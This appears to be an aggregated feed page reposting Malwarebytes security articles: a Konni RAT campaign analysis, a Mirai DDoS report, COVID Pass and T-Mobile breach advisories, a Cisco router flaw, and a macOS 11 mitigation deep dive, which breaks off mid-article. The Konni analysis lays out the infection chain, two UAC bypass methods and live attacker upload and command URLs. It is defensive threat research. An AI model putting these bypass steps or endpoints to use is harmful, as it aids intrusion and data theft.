IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

New variant of Konni malware used in campaign targetting Russia

This blog post was authored by Hossein Jazi

In late July 2021, we identified an ongoing spear phishing campaign pushing Konni Rat to target Russia. Konni was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group named APT37.

We discovered two documents written in Russian language and weaponized with the same malicious macro. One of the lures is about the trade and economic issues between Russia and the Korean Peninsula. The other one is about a meeting of the intergovernmental Russian-Mongolian commission.

In this blog post we provide on overview of this campaign that uses two different UAC bypass techniques and clever obfuscation tricks to remain under the radar.

Attack overview

The following diagram shows the overall flow used by this actor to compromise victims. The malicious activity starts from a document that executes a macro followed by a chain of activities that finally deploys the Konni Rat.

k 1
Figure 1: Overall Process

Document analysis

We found two lures used by Konni APT. The first document “Economic relations.doc” contains a 12 page article that seems to have been published in 2010 with the title: “The regional economic contacts of Far East Russia with Korean States (2010s)“. The second document is the outline of a meeting happening in Russia in 2021: “23th meeting of the intergovernmental Russian-Mongolian commission on Trade, Economic, scientific and technical operation“.

lures
Figure 2: Lures used by Konni APT

These malicious documents used by Konni APT have been weaponized with the same simple but clever macro. It just uses a Shell function to execute a one-liner cmd command. This one liner command gets the current active document as input and looks for the "^var" string using findstr and then writes the content of the line staring from “var” into y.js. At the end it calls Wscript Shell function to executes the Java Script file (y.js).

The clever part is that the actor tried to hide its malicious JS which is the start of its main activities at the end of the document content and did not put it directly into the macro to avoid being detected by AV products as well as hiding its main intent from them.

macro
Figure 3: Macro

The y.js file is being called with the active document as its argument. This javascript looks for two patterns encoded within the the active document and for each pattern at first it writes that content starting from the pattern into temp.txt file and then base 64 decodes it using its built-in base64 decoder function, function de(input), and finally writes the decoded content into the defined output.

yy.js is used to store the data of the first decoded content and y.ps1 is used to store the data of the second decoded content. After creating the output files, they are executed using Wscript and Powershell.

yjs scaled
Figure 4: y.js

The Powershell script (y.ps1), uses DllImport function to import URLDownloadToFile from urlmon.dll and WinExec from kernel32.dll. After importing the required functions it defines the following variabbles:

  • URL to download a file from it
  • Directory to store the downloaded file (%APPDATA%/Temp)
  • Name of the downloaded file that will be stored on disk.

In the next step it calls URLDownloadToFile to download a cabinet file and stores it in the %APPDATA%Temp directory with the unique random name created by GetTempFileName. At the end it uses WinExec to execute a cmd command that calls expand to extract the content of cabinet file and delete the cabinet file. The y.ps1 is deleted at the end using Winexec.

psfile
Figure 5: y.ps1

The extracted cabinet file contains 5 files: check.bat, install.bat, xmlprov.dll, xmlprov.ini and xwtpui.dll. The yy.js is responsible to execute check.bat file that extracted from the cabinet file and delete itself at the end.

yy.js
Figure 6: yy.js

Check.bat

This batch file checks if the command prompt is launched as administrator using net session > nul and if that is the case, it executes install.bat. If the user does not have the administrator privilege, it checks the OS version and if it is Windows 10 sets a variable named num to 4, otherwise it sets it to 1. It then executes xwtpui.dll using rundll32.exe by passing three parameters to it: EntryPoint (The export function of the DLL to be executed), num (the number that indicated the OS version) and install.bat.

check
Figure 7: check.bat

Install.bat

the malware used by the attacker pretends to be the xmlprov Network Provisioning Service. This service manages XML configuration files on a domain basis for automatic network provisioning.
Install.bat is responsible to install xmlprov.dll as a service. To achieve this goal, it performs the following actions:

  • Stop the running xmlprov service
  • Copy dropped xmlprov.dll and xmlrov.ini into the system32 directory and delete them from the current directory
  • Check if xmlProv service is installed or not and if it is not installed create the service through svchost.exe
  • Modify the xmlProv service values including type and binpath
  • Add xmlProv to the list of the services to be loaded by svchost
  • add xmlProv to the xmlProv registry key
  • Start the xmlProv service
install
Figure 8: Install.bat

xwtpui.dll

As we mentioned earlier if the victim’s machine does not have the right privilege, xwtpui.dll is being called to load install.bat file. Since install.bat is creating a service, it should have the high integrity level privilege and "xwtpui.dll" is used to bypass UAC and get the right privilege and then loads install.bat.

EntryPoint is the main export function of this dll. It starts its activities by resolving API calls. All the API call names are hard coded and the actor has not used any obfuscation techniques to hide them.

mainswt
Figure 9: EntryPoint

In the next step, it checks privilege level by calling the Check_Priviledge_Level function. This function performs the following actions and returns zero if the user does not have the right privilege or UAC is not disabled.

  • Call RtlQueryElevationFlags to get the elevation state by checking PFlags value. If it sets to zero, it indicates that UAC is disabled.
  • Get the access token associated to the current process using NtOpenProcessToken and then call NtQueryInformationToken to get the TokenElevationType and check if it’s value is 3 or not (If the value is not 3, it means the current process is elevated). The TokenElevationType can have three values:
    • TokenElevationDefault (1): Indicates that UAC is disabled.
    • TokenElevationTypeFull (2): Indicates that the current process is running elevated.
    • TokenElevationTypeLimited (3): Indicates that the process is not running elevated.
CheckPrivelege
Figure 10: Check privilege level

After checking the privilege level, it checks the parameter passed form check.bat that indicates the OS version and if the OS version is Windows 10 it uses a combination of a modified version of RPC UAC bypass reported by Google Project Zero and Parent PID Spoofing for UAC bypass while for other Windows versions it uses “Token Impersonation technique” technique to bypass UAC.

Token Impersonation UAC Bypass (Calvary UAC Bypass)

Calvary is a token impersonation/theft privilege escalation technique that impersonates the token of the Windows Update Standalone Installer process (wusa.exe) to spawn cmd.exe with highest privilege to execute install.bat. This technique is part of the US CIA toolsets leak known as Vault7.

The actor has used this method on its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExw and gets its access token using NtOpenProcessToken. Then the access token of wusa.exe is duplicated using NtDuplicatetoken. The DesiredAccess parameter of this function specifies the requested access right for the new token. In this case the actor passed TOKEN_ALL_ACCESS as DesiredAccess value which indicates that the new token has the combination of all access rights of this current token. The duplicated token is then passed to ImpersonateLoggedOnUser and then a cmd instance is spawned using CreateProcessWithLogomW. At the end the duplicated token is assigned to the created thread using NtSetINformationThread to make it elevated.

cavalry
Figure 11: Cavalry PE

Windows 10 UAC Bypass

The UAC bypass used for Windows 10 uses a combination of a modified version of RPC based UAC bypass reported by Google project Zero and Parent PID spoofing to bypass UAC. The process is as follows:

  • Step 1: Creates a string binding handle for interface id “201ef99a-7fa0-444c-9399-19ba84f12a1a” and returns its binding handle and sets the required authentication, authorization and security Quality of service information for the binding handle.
bind
Figure 12: RPC Binding
  • Step 2: Initializes an RPC_ASYNC_STATE to make asynchronous calls and creates a new non-elevated process (it uses winver.exe as non-elevated process) through NdrAsyncClientCall.
asyncCall
Figure 13: RPC AsyncCall
  • Step 3: Uses NtQueryInformationProcess to Open a handle to the debug object by passing the handle of the created process to it. Then detaches the debugger from the process using NtRemoveProcessDebug and terminates this created process using TerminateProcess.
detach
Figure 14: Detach the process
  • Step 4: Repeats the step 1 and step 2 to create a new elevate process: Taskmgr.exe.
  • Step 5: Get full access to the taskmgr.exe process handle by retrieving its initial debug event.  At first It issues a wait on the debug object using WaitForDebugEvent to get the initial process creation debug event and then uses NtDuplicateObject to get the full access process handle.
taskmgr
Figure 15: Create Auto elevated process (TaskMgr.exe)
  • Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses this handle to execute cmd as high privilege process to execute install.bat. To achieve this, the actor has used Parent PID Spoofing technique to spawn a new cmd process using CreateProcessW and handle of Taskmgr.exe which is an auto elevated process is assigned as its parent process using UpdateProcThreadAttribute.
pidspoof
Figure 16: Parent PID Spoofing

Xmlprov.dll (Konni Rat)

This is the final payload that has been deployed as a service using svchost.exe. This Rat is heavily obfuscated and is using multiple anti-analysis techniques. It has a custom section named “qwdfr0” which performs all the de-obfuscation process. This payload register itself as a service using its export function ServiceMain.

servicemain
Figure 17: ServiceMain

Even though this sample is heavily obfuscated its functionality has not changed much and it is similar to its previous version. It seems the actor just used a heavy obfuscation process to hinder all the security mechanisms. VirusTotal detection of this sample at the time of analysis was 3 which indicates that the actor was successful in using obfuscation and bypass most of the AV products.

This RAT has an encrypted configuration file “xmlprov.ini” which will be loaded and decrypted at the start of the analysis. The functionality of this RAT starts by collecting information from the victim’s machine by executing the following commands:

  • cmd /c systeminfo: Uses this command to collect the detailed configuration information about the victim’s machine including operation system configurations, security information and hardware data (RAM size, disk space and network cards info) and store the collected data in a tmp file.
  • cmd /c tasklist: Executes this command to collect a list of running processes on victim’s machine and store them in a tmp file.

In the next step each of the the collected tmp files is being converted into a cab file using cmd /c makecab and then encrypted and sent to the attacker server in an HTTP POST request (http://taketodjnfnei898.c1.biz/up.php?name=%UserName%).

upload
Figure 18: Upload data to server

After sending data to server it goes to a loop to receive commands from the server (http://taketodjnfnei898.c1.biz/dn.php?name=%UserName%&prefix=tt). At the time of the analysis the server was down and unfortunately we do not have enough information about the next step of this attack. The detail analysis of this payload will be published in a follow up blog post.

Campaign Analysis

Konni is a Rat that potentially is used by APT37 to target its victims. The main victims of this Rat are mostly political organizations in Russia and South Korea but it is not limited to these countries and it has been observed that it has targeted Japan, Vietnam, Nepal and Mongolia.

There were several operations that used this Rat but specifically the campaigns reported by ESTsecurity and CyberInt in 2019 and 2020 are similar to what we reported here. In those campaigns the actor used lures in Russian language to target Russia. There are several differences between past campaigns of this actor and what we documented here but still the main process is the same: in all the campaigns the actor uses macro weaponized documents to download a cab file and deploy the Konni RAT as a service.

Here are the some major differences between this new campaign and older ones:

  • The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content.
  • In the new campaign JavaScript files have been used to execute batch and PowerShell files.
  • The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file.
  • The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique.
  • In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration.

Malwarebytes customers are protected against this campaign.

block

IOCs

name Sha256
N/A fccad2fea7371ad24a1256b78165bceffc5d01a850f6e2ff576a2d8801ef94fa
economics relations.doc d283a0d5cfed4d212cd76497920cf820472c5f138fd061f25e3cddf65190283f
y.js 7f82540a6b3fc81d581450dbdf7dec7ad45d2984d3799084b29150ba91c004fd
yy.js 7a8f0690cb0eb7cbe72ddc9715b1527f33cec7497dcd2a1010def69e75c46586
y.ps1 617f733c05b42048c0399ceea50d6e342a4935344bad85bba2f8215937bc0b83
 tmpBD2B.tmp 10109e69d1fb2fe8f801c3588f829e020f1f29c4638fad5394c1033bc298fd3f
check.bat a7d5f7a14e36920413e743932f26e624573bbb0f431c594fb71d87a252c8d90d
install.bat 4876a41ca8919c4ff58ffb4b4df54202d82804fd85d0010669c7cb4f369c12c3
xwtpui.dll 062aa6a968090cf6fd98e1ac8612dd4985bf9b29e13d60eba8f24e5a706f8311
xmlprov.dll f702dfddbc5b4f1d5a5a9db0a2c013900d30515e69a09420a7c3f6eaac901b12
xmlprov.dll 80641207b659931d5e3cad7ad5e3e653a27162c66b35b9ae9019d5e19e092362
xmlprov.ini 491ed46847e30b9765a7ec5ff08d9acb8601698019002be0b38becce477e12f6

Domains:
takemetoyouheart[.]c1[.]biz
taketodjnfnei898[.]ueuo[.]com
taketodjnfnei898[.]c1[.]biz
romanovawillkillyou[.]c1[.]biz

The post New variant of Konni malware used in campaign targetting Russia appeared first on Malwarebytes Labs.

Largest DDoS attack ever reported gets hoovered up by Cloudflare

On the Cloudflare blog, the American web infrastructure behemoth that provides content delivery network (CDN) and DDoS mitigation services reports that it detected and mitigated a 17.2 million request-per-second (rps) DDoS attack. To put that number in perspective. The company reports that this is three times as large as anything it has seen before.

DDoS

In a DDoS attack, an attacker tries to stop people from using a service by making it so busy it either crashes or grinds to a halt. It does this by flooding the service with spurious requests from multiple, distributed locations.

If hacking is opening a door by picking its lock, then DDoS is blocking the door by boarding it up from the outside.

The target

The target of this enormous DDoS attack was a customer of Cloudflare in the financial sector. Cloudflare reports that within seconds, the botnet bombarded the its edge with over 330 million requests.

For Internet devices, the network edge is where the device, or the local network containing the device, communicates with the Internet. The “edge” in this case refers to the Cloudflare CDN, which customers use to improve the performance of their websites. CDNs are geographically dispersed clusters of servers that store web content. When users try to access a website that uses a CDN, they actually get directed to the nearest CDN server rather than the website itself, and Cloudflare handles the web traffic. Similarly, if somebody tries to DDoS attack the website, the attack ends up hitting the Cloudflare CDN.

The Cloudflare CDN is absolutely enormous, and is used by almost 20% of all websites, which means it can handle an absolutely enormous amount of traffic.

The botnet

The attack traffic is reported to have originated from more than 20,000 bots in 125 countries around the world. Based on the bots’ source IP addresses, almost 15% of the attack originated from Indonesia and another 17% from India and Brazil combined. Cloudflare attributes this attack to the Mirai botnet. Although the number of Mirai bots is on the decline, the botnet was still able to generate impressive volumes of attack traffic for short periods.

You may remember hearing about this botnet after the massive East Coast internet outage of 2016 when the Mirai botnet was leveraged in a DDoS attack aimed at Dyn, an Internet infrastructure company. Traffic to Dyn’s Internet directory servers throughout the US—primarily on the East Coast but later on the opposite end of the country as well—was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.

Although it hasn’t generated headlines like that for a few years, we recently we posted about how Mirai was trying to add a host of home routers to its collection of compromised devices. It was found hijacking routers using a vulnerability that was disclosed only two days earlier

As it happens Microsoft wrote about the Mozi botnet, which is essentially a Mirai variant, going after Netgear, Huawei, and ZTE gateways by using clever persistence techniques that are specifically adapted to each gateway’s particular architecture. Last year, security experts from IBM X-Force said that the Mozi botnet accounted for 90 percent of traffic from IoT devices at that time.

Vulnerabilities

Mirai works by harnessing tens of thousands of small, low-powered Internet-of-Things (IoT) devices, such as Internet-connected cameras and home routers. Although each device it compromises only adds a little horsepower to Mirai’s engine, there are plenty of them to hijack.

Vulnerabilities in home networking equipment often go unpatched for long periods. Since most home users are unaware of the existence of such vulnerabilities and many lack the skills and/or confidence to apply a patch if one is made available.

And almost the same can be said about many small and medium-sized businesses. As long as the equipment works many fail to see the need for patching or the need to replace vulnerable devices. In some cases patches are not even made available when devices are replaced by newer models. Or because vendors fail to inform users about the vulnerability existing in the first place.

Mitigation

When it coms to blocking DDoS attacks there is not much businesses can do, except hire specialized help. But there are some things you can do so you do not become part of the problem.

Businesses and consumers alike should also start worrying about securing their IoT devices in a manner that they can’t be used in a DDoS botnet. We have an excellent article called Internet of Things (IoT) security: what is and what should never be that explains in detail why and how you can make the IoT a safer place.

And maybe, just maybe, we should try and work out Internet protocols that are designed so that they do not offer opportunities for DDoS attacks.

The post Largest DDoS attack ever reported gets hoovered up by Cloudflare appeared first on Malwarebytes Labs.

Beware of COVID Pass scams

You’ve likely seen fake parcel delivery texts in the news recently, and we’ve covered a few of these ourselves. SMS missives claim a package is waiting to be delivered, and a small processing fee is required. There is no package; it’s a ruse to have people hand over their credit card details. It’s been wildly successful during lockdown, at a time when many are having to order almost everything they can online.

This isn’t the only bogus SMS message doing the rounds, however. COVID-19 is proving to be a a crucial piece of bait for this kind of tactic as we’ll see below.

The road to a (non-existent) COVID Pass

This attack is aimed at residents of the UK. It makes use of social engineering in a similar fashion to other pandemic-themed SMS texts, with a strong psychological aspect tied in for good measure.

This one works as follows:

  1. SMS messages are sent to unsuspecting individuals.
  2. The linked site is HTTPs, to give that added sheen of “this is the real website, because it’s got a padlock”. Hopefully you know that a padlock does not mean you can trust a website, many don’t.
  3. The site design imitates the usual look and feel of NHS websites, specifically those related to COVID-19. Here’s an example of the real thing.
  4. The scammers ask for a lot of details across multiple pages, beginning with “the exact name used when you registered with your GP surgery”. From there, they ask for date of birth, post code, and an address where they can deliver “your Covid pass credentials to be registered on our NHS app”. After this, they request “a payment of £4.99 to process your Covid Pass application”.
nhsscam1
Fake “Covid Pass” site
nhsscam4
Fake “Covid Pass” site asking for payment details

This doesn’t get a free pass to your bank account

It’s important to note that the UK does have an actual Covid Pass system in place. There’s a proper process in place, and it doesn’t involve handing money over to random websites. It’s also worth noting there’s been a number of other scams along these same lines.

Should you receive one of these text messages, you can safely ignore it and report for spam while you’re at it.

The post Beware of COVID Pass scams appeared first on Malwarebytes Labs.

T-Mobile customers, change your PINs

At the end of last week, T-Mobile was investigating reports of a “massive” customer data breach. A hacker claimed to stolen 100 million people’s data from T-Mobile’s servers, which included everything from names and driver licences to addresses and social security numbers.

It’s now confirmed something bad did take place. Their estimate is currently “at least” 47m affected people, with around 7.8 million current postpaid customers impacted. The most pressing issue is that of postpaid account customer’s PINs.

PIN compromise

Roughly 850k active prepaid accounts had account PINS exposed, along with names and phone numbers. These PINs are used to help identify the account owner on customer service phone calls. If a scammer knows your PIN, they can potentially perform a SIM swap attack, giving them control of your mobile number, SMS messages, SMS 2FA… Gaining control of a mobile device isn’t far off having the keys to someone’s digital kingdom.

What to do?

T-Mobile have outlined the situation thus far, along with some pieces of advice for anybody worried by recent events.

The priority has to be the PIN codes. The company recommends ALL postpaid customers change their PIN to a new one, not just the 850k people known to be affected, just in case. This is because they currently have no evidence that postpaid PINs have been taken, but better safe than sorry.

They also recommend postpaid customers sign up to their Account Takeover Protection service to make things even harder for would-be hijackers. We note that T-Mobile also has a biometric verification feature, which can replace the problem of compromised PINs altogether. With a bit of luck, these proactive steps will help ease the concerns of anyone affected by this breach.

Even so, there’s a few more things to be wary of on the horizon.

What’s next?

Any time a breach occurs, a key concern has to be phishing and social engineering. Personal information is a goldmine for people who are up to no good. Customers should brace themselves for criminals taking advantage of the situation with a wave of fresh phish served up…now with more personalisation than ever before.

Anyone affected by a data breach before—and that’s a lot of us—will be familiar with the credit score dance that comes after. T-Mobile is offering “2 years of free identity protection services”, and have not long ago published a dedicated breach page.

From there, people can see an easy-to-digest slice of information which:

  • Explains what happened, details compromised data, and mentions their next steps.
  • Clearly advises what customers can do next, including a variety of security steps and a few more additional resources related to credit score / monitoring / related services.
  • Lists a contact number for support calls, which is something that can easily go missing on a page like this.

All in all, not a great situation for anybody to be in. However, T-Mobile have done a good job of rounding up the details and making it obvious what people should do next. This hasn’t always been the case with major breaches in the past, and one hopes this can continue the next time something bad happens. That one-stop-shop page will almost certainly be updated should fresh information emerge, so T-Mobile customers would be wise to bookmark it for the coming weeks or months.

The post T-Mobile customers, change your PINs appeared first on Malwarebytes Labs.

Cisco Small Business routers vulnerable to remote attacks, won’t get a patch

In a security advisory, Cisco has informed users that a vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.

Normally we’d say “patch now”, but you can’t, and you’ll never be able to because a patch isn’t coming.

CVE-2021-34730

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed under CVE-2021-34730. As a result of improper validation of incoming UPnP traffic an attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device.

A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system, or cause the device to reload, resulting in a DoS condition. “Executing arbitrary code as the root user” is tantamount to “do whatever they like”, which is bad. A CVSS score of 9.8 out of 10 bad. (CVSS can help security teams and developers prioritize threats and allocate resources effectively.)

UPnP

Universal Plug and Play (UPnP) is a set of networking protocols that permit networked devices, like routers, to seamlessly discover each other’s presence on a network and establish functional network services.

From that description alone it should be clear that, from a security point of view, this protocol has no place on an Internet-facing device. Once you have set up your connections to the internal devices there is nor reason to leave UPnP enabled. There are plenty of reasons to disable it.

A lot of the problems associated with UPnP-based threats can be linked back to security issues during implementation. Router manufacturers historically have not been very good at securing their UPnP implementations, which often leads to the router not checking input properly. Which is exactly what happened here. Again.

And then there are vulnerabilities in UPnP itself. The most famous one probably is CallStranger, which was caused by the Callback header value in UPnP’s SUBSCRIBE function that can be controlled by an attacker and enables a vulnerability which affected millions of Internet-facing devices.

That particular vulnerability should have been patched by most vendors by now by the way. But CVE-2021-34730 won’t be, here’s why…

No patch

The affected routers have entered the end-of-life process and so Cisco has not released software updates to fix the problem. According to the security advisory, it seems they have no plans to do so either:

“Cisco has not released and will not release software updates to address the vulnerability described in this advisory.” Cisco also says it is not aware of any malicious use of the vulnerability.

Since there are no workarounds that address this vulnerability, the only choice that administrators have is to disable the affected feature (UPnP). Or buy a new router. Since the routers won’t receive any updates for issues in future either, we suggest you do both: Disable UPnP now, and buy a new router soon.

Mitigation

For owners of the affected routers it is particularly important to check that UPnP is disabled both on the WAN and the LAN interface. The WAN interface is set to off by default but that doesn’t mean it hasn’t been changed since. The LAN interface is set to on by default and needs to be turned off. Cisco advises that to disable UPnP on the LAN interface of a device, you do the following:

  • Open the web-based management interface and choose Basic Settings > UPnP.
  • Check the Disable check box.

It is important to disable UPnP on both interfaces because that is the only way to eliminate the vulnerability.

Stay safe, everyone!

The post Cisco Small Business routers vulnerable to remote attacks, won’t get a patch appeared first on Malwarebytes Labs.

macOS 11’s hidden security improvements

A deep dive into macOS 11’s internals reveals some security surprises that deserve to be more widely known.

Contents

  1. Introduction
    1. Disclaimers
  2. macOS 11’s better known security improvements
    1. Secret messages revealed?
  3. CPU security mitigation APIs
    1. The NO_SMT mitigation
    2. The TECS mitigation
    3. Who benefits from NO_SMT and TECS?
  4. Endpoint Security API improvements
    1. More message types
    2. More notifications, less polling
    3. More metadata
    4. Improved performance
  5. A vulnerability quietly fixed
  6. O_NOFOLLOW_ANY
  7. Conclusion
  8. Endnotes

Introduction

When a new release of an operating system comes out, normal people find out what’s new by attending developer conferences, reading release notes, changelogs, reviews.

Me, I download the software development kit (SDK) for the new version, and diff it with the current version.

This is not uncommon on, say, Windows: There are entire websites dedicated to large scale, long term, differential reverse engineering, that tell you what new functions appeared in what version of Windows, how their relationship with other functions has changed, how internal data structures have evolved etc. On macOS, nobody seems to do it (at least not in public), and something as simple as diffing the includes from one SDK version to the next and patiently going through it, file by file, can reveal interesting features nobody knows (or at least talks) about.

Comparing the macOS 11 and macOS 10.15 SDKs, I found several intriguing surprises that deserve to be more widely known.

Disclaimers

In this article, I describe poorly-documented, or completely undocumented, features that could stop working as advertised or disappear completely without notice in future releases of macOS. Use common sense, assess the risks, choose, and take responsibility for your choice.

Note that I’m just a developer, neither a security researcher nor an exploit writer, and my descriptions of security issues and their mitigations might fall between “slightly incorrect” and “completely wrong”. I welcome corrections.

macOS 11’s better known security improvements

At the WWDC 2020, Apple made a big deal of several new macOS and iOS features that were, in fact, big deals. This article was supposed to come out much earlier, and I don’t expect anyone still remembers what the fuss was about over a year later, so I’ll give you a brief recap.

The major new security features that would debut in macOS 11 were:

  • Pointer Authentication Codes (PAC), hardware-enforced Call Flow Integrity (CFI), implemented by Apple’s homegrown 64 bit ARM processor, the M1. Currently limited to system code and kernel extensions, but open to all third-party developers for experimentation.
  • Device isolation was another M1-only feature, that uses the more powerful IOMMU of that platform to make sure hardware devices can only share memory with the operating system and not with each other. Cross-device memory sharing is a historical custom, based on a blind, unfounded trust in hardware.
  • Write XOR Execute (W^X) finally came to macOS, in a hardware-enforced form (yes, another M1-only feature). Memory pages can now be either writable or executable, never both at the same time; no exceptions. Just-in-time (JIT) compilers will need to be redesigned around this limitation to run on ARM Macs, but special APIs are provided to make the work easier.
  • Signed System Volume (SSV) cryptographically sealed the boot volume and made it tamper-evident. (MacOS has booted from a read-only volume since 10.15.) Apple’s Protecting data at multiple layers article briefly describes SSV, but Howard Oakley has an even more detailed write-up on his blog, with illustrations; a must-read. You should also check out Andrew Cunningham’s review of macOS 11.

These technologies have justly earned the attention of the press and security researchers, and they’ve been discussed in great detail elsewhere. (The Apple video Explore the new system architecture of Apple silicon Macs from session 10686 of the WWDC 2020 has a good overview of most of the new security features, and more.)

There’s really nothing I could add to what the excellent resources out there say about these topics, but there are other security improvements that everyone seems to have missed, and that Apple seems to be shy about.

Secret messages revealed?

On second thoughts, maybe my rummaging approach can add something novel (although incredibly trivial) to the publicly-disclosed security improvements: I’ve not seen anybody mention the fact that the cryptographically sealed filesystem underlying SSV is internally code-named “Cryptex”. The cryptex(5) man page claims that: “The name ‘cryptex’ is a portmanteau for ‘CRYPTographically-sealed EXtension’.”

… but I know, we know, they know that they took the name from Dan Brown’s best-selling, award-winning birdcage liner The Da Vinci Code. The otherwise forgettable (and best-forgotten) airport thriller introduced the intriguing concept of a cryptex: a secret message, sealed by a combination lock, that would self-destruct if opened by force.

There are intriguing hints in cryptex(5) that suggest a wider Cryptex Cinematic Universe, like references to a cryptexctl(1) command and a cryptexd(8) daemon, but those man pages are nowhere to be found, nor are the two binaries part of macOS. A placeholder man page for libcryptex(3) has literally nothing to say about the “Cryptex management library”, except an interesting detail: A copyright date of 19 October, 2018, suggesting that SSV had been in development for a long time before materializing as an end user feature.

The SDK includes the import libraries for libcryptex, libcryptex_core and libcryptex_interface, but not the libraries themselves, so we have the lists of exported symbols but not the code behind them. The libraries, too, are not part of macOS, which makes me think that the scattered Cryptex artefacts found in the SDK probably escaped, no idea how, from an Apple private code corral.

All that the symbol lists can tell us is that the politically correct “CRYPTographically-sealed EXtension” revisionism can be put to rest: To me, functions with names like codex_install_pack (exported by libcryptex_interface) unquestionably prove a Brownian origin of the name!

CPU security mitigation APIs

Developers are taught to think of the CPU as a perfect, mathematical abstraction. In 2018, year of microarchitectural vulnerabilities (Spectre and Meltdown to name the most infamous ones), we were set straight: CPUs run on code; CPU developers weren’t preternaturally capable of writing multithreaded code without race conditions; and the CPUs they made were buggy, unreliable and traitorous, conspiring with applications against the operating system (OS) to bypass access controls in undetectable ways.

The issues that could be fixed were fixed. The remaining issues could only be mitigated, either in the OS or the compiler, at the the cost of performance. I was aware of the mitigations rolled out by Microsoft as Windows updates, the new MSVC compiler option /Qspectre, the changes to the Chrome JIT compiler to prevent it from generating exploitable code from malicious Javascript, etc.

But, I was surprised to discover new, unannounced, completely undocumented mitigations in macOS 11.

As far as I can tell, this is the first public article ever written that describes them. The new APIs return virtually no hits in grep.app or GitHub code search—or Google, for that matter.

Two kinds of mitigations are provided, codenamed NO_SMT and TECS. Let’s have a closer look at them.

The NO_SMT mitigation

What is it?

NO_SMT disables Simultaneous multithreading (SMT), the CPU feature better known under Intel’s trade name of “Hyper-Threading”. SMT allows a CPU core to execute two or more threads at the same time, for improved performance at the cost of contention for per-core resources, such as caches, TLBs etc.

Letting multiple threads share invisible resources carries the risk of letting a malicious thread steal secrets from a “sibling” thread running on the same core—a risk that over the years has materialized into multiple attacks, like TLBleed, PortSmash, Fallout, ZombieLoad, RIDL. A straightforward mitigation for this entire family of attacks, past and future, is then to simply disable SMT, which is what NO_SMT does.

How to use NO_SMT

In C/C++, #include <libproc.h>; no extra library necessary. From <libproc.h>:

/*
 * NO_SMT means that on an SMT CPU, this thread must be scheduled alone,
 * with the paired CPU idle.
 *
 * Set NO_SMT on the current proc (all existing and future threads)
 * This attribute is inherited on fork and exec
 */
int proc_set_no_smt(void) __API_AVAILABLE(macos(11.0));

/* Set NO_SMT on the current thread */
int proc_setthread_no_smt(void) __API_AVAILABLE(macos(11.0));

Simply call proc_set_no_smt to enable NO_SMT for the entire process (existing and future threads alike), or proc_setthread_no_smt to enable it for the calling thread only. Like the comments say, fork(2) children inherit the parent process’s NO_SMT state, and exec(2) won’t reset it.

Note that “libproc” is a misnomer, and these aren’t library functions but thin C wrappers over the private system call process_policy(2).

NO_SMT also extends posix_spawn(2), so that we can enable mitigations for a new process without setting them for the current process, or spawning a short-lived fork(2) child (ideally, we should never call fork(2) again in any new code, on any OS. Ever). From <spawn.h>:

int     posix_spawnattr_setnosmt_np(const posix_spawnattr_t * __restrict attr) __API_AVAILABLE(macos(11.0));

posix_spawnattr_setnosmt_np(3) performs the equivalent of proc_set_no_smt on the new process. In the name of the function, the “_np” suffix stands for “non-portable”: A customary way to mark OS-specific extensions to posix_spawn(2).

“But I already use fork(2) and I can’t stop using it! How do I enable NO_SMT after exec(2) without enabling them for the fork child?” You’re in luck, because macOS has you covered: Any posix_spawn(2) feature is automatically available to exec(2) thanks to non-standard flag POSIX_SPAWN_SETEXEC, that can be set on a posix_spawnattr_t using posix_spawnattr_setflags(3), and makes posix_spawn(2) behave like exec(2), replacing the current process instead of creating a new one.

How does it work?

NO_SMT is implemented as a per-task (not per-process[1]) flag, named TF_NO_SMT, or a per-thread scheduling flag named TH_SFLAG_NO_SMT. The flag is copied from tasks to their children, tasks and threads alike; it’s a write-once flag, that once set cannot be removed. The flag is then copied from each thread to the CPU they’re currently running on (field processor_t::current_is_NO_SMT).

NO_SMT is implemented by the dualq scheduling algorithm, in a pretty straightforward way: A NO_SMT thread cannot share a CPU core with any other thread.

NO_SMT can be disabled system-wide with boot argument disable_NO_SMT_threads, which causes the kernel variable sched_allow_NO_SMT_threads to be initialized with 0 instead of 1. The current value of sched_allow_NO_SMT_threads can be queried with sysctl kern.sched_allow_NO_SMT_threads:

tstudent@MAC-67C2FA8CA4EC ~ % sysctl kern.sched_allow_NO_SMT_threads
kern.sched_allow_NO_SMT_threads: 1

The equivalent of NO_SMT can be forced on system-wide at the firmware level, by setting NVRAM variable SMTDisable to %01, as described in Apple support article HT210108.

Why you probably shouldn’t use NO_SMT

Enabling NO_SMT through the API, instead of configuring the firmware to boot the machine with SMT support disabled, provides limited protection, as the sched_allow_NO_SMT_threads variable is writable at runtime by the superuser:

tstudent@MAC-67C2FA8CA4EC ~ % sudo sysctl kern.sched_allow_NO_SMT_threads=0
Password:
kern.sched_allow_NO_SMT_threads: 1 -&gt; 0

This instantly disables NO_SMT system-wide. I wonder why they bothered making it a write-once flag, only to make it so trivial to disable.

The TECS mitigation

What is it?

I have been unable to figure out what TECS stands for. Closest I could get was this comment from the source code of the kernel (osfmk/kern/task.h, from XNU 7195.50.7.100.1):

#define TF_TECS                 0x00020000                              /* task threads must enable CPU security */

Thread Enable CPU Security? Even if it’s the correct interpretation, it doesn’t help us understand what it does.

In its current incarnation (the generic name suggests the specifics might change in the future), TECS flushes certain internal CPU buffers before returning from kernel mode to user mode. It’s a mitigation for the Rogue Data Cache Load (RDCL) family of attacks (like Meltdown) and the Microarchitectural Data Sampling (MDS) family of attacks (like RIDL and Fallout).

How to use TECS

